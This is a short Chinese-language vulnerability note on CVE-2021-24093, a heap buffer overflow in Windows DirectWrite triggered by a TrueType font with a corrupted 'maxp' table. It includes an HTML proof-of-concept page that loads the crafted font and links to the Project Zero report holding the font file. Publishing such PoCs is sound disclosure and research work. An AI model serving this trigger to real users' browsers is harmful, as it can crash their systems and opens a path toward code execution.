# Microsoft Graphics Components 代码执行漏洞 (CVE-2021-24093)

Microsoft Graphics Components是美国微软（Microsoft）公司的图形驱动组件。 Microsoft Windows 图形组件中存在安全漏洞.CVE-2021-24093漏洞基于DirectWrite堆的缓冲区溢出，驻留在特制TrueType字体的处理中。

当加载并光栅化具有损坏的“maxp”表的格式错误的TrueType字体时，DWrite!fsg_ExecuteGlyph函数崩溃。

**PoC：**


```html
<html>
   <head>
    <style>
      @font-face { font-family: custom_font; src: url('poc.ttf'); } 
      span {
         font-family: custom_font;
         font-size: 10pt;
         font-variation-settings: 'WIND' 359;
      }
    </style>
    <script>
      alert('Press OK to load the font');
    </script>
   </head>
   <body>
      <span>Æ</span>
   </body>
</html>
```

**poc.ttf:**

https://bugs.chromium.org/p/project-zero/issues/detail?id=2123

ref:

* https://bugs.chromium.org/p/project-zero/issues/detail?id=2123
* https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=478314
* https://www.anquanke.com/vul/id/2344115